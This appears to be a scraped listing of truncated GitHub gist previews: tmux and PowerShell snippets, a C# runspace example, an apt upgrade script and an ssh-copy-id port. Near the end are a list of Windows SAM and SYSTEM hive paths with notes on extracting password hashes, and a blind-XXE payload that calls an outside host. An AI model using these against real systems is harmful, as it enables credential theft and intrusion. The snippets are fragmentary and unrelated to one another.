(C-x means ctrl+x, M-x means alt+x)
The default prefix is C-b. If you (or your muscle memory) prefer C-a, you need to add this to ~/.tmux.conf:
| # Disable 'Automatically detect proxy settings' in Internet Explorer. | |
| function Disable-AutomaticallyDetectProxySettings | |
| { | |
| # Read connection settings from Internet Explorer. | |
| $regKeyPath = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\" | |
| $conSet = $(Get-ItemProperty $regKeyPath).DefaultConnectionSettings | |
| # Index into DefaultConnectionSettings where the relevant flag resides. | |
| $flagIndex = 8 |
| // First create a runspace | |
| // You really only need to do this once. Each pipeline you create can run in this runspace. | |
| RunspaceConfiguration psConfig = RunspaceConfiguration.Create(); | |
| var psRunspace = RunspaceFactory.CreateRunspace(psConfig); | |
| psRunspace.Open(); | |
| // Now create a pipeline for the current cmdlet invocation | |
| using ( Pipeline psPipeline = psRunspace.CreatePipeline() ) | |
| { | |
| // Define the command to be executed in this pipeline |
| ([adsi]'WinNT://domain/username,user').ChangePassword('oldpassword','newpassword') |
| # This is a super **SIMPLE** example of how to create a very basic powershell webserver | |
| # 2019-05-18 UPDATE — Created by me and and evalued by @jakobii and the comunity. | |
| # Http Server | |
| $http = [System.Net.HttpListener]::new() | |
| # Hostname and port to listen on | |
| $http.Prefixes.Add("http://localhost:8080/") | |
| # Start the Http Server |
| #!/bin/bash | |
| # update & dist-upgrade | |
| unset UCF_FORCE_CONFFOLD | |
| export UCF_FORCE_CONFFNEW=YES | |
| ucf --purge /boot/grub/menu.lst | |
| export DEBIAN_FRONTEND=noninteractive | |
| apt-get update | |
| apt-get -o Dpkg::Options::="--force-confnew" --force-yes -fuy dist-upgrade |
| #requires -version 2 | |
| <# | |
| .SYNOPSIS | |
| <Overview of script> | |
| .DESCRIPTION | |
| <Brief description of script> | |
| .PARAMETER <Parameter_Name> | |
| <Brief description of parameter input required. Repeat this attribute if required> |
| """ssh-copy-id for Windows. | |
| Example usage: python ssh-copy-id.py ceilfors@my-remote-machine | |
| This script is dependent on msysgit by default as it requires scp and ssh. | |
| For convenience you can also try that comes http://bliker.github.io/cmder/. | |
| """ | |
| import argparse, os | |
| from subprocess import call |
| %SYSTEMDRIVE%\boot.ini | |
| %WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system. | |
| %SYSTEMROOT%\repair\SAM | |
| %SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods. | |
| %SYSTEMROOT%\repair\system | |
| %SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods. | |
| %SYSTEMROOT%\repair\SAM | |
| %SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files. | |
| %WINDIR%\repair\sam | |
| %WINDIR%\repair\system |
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |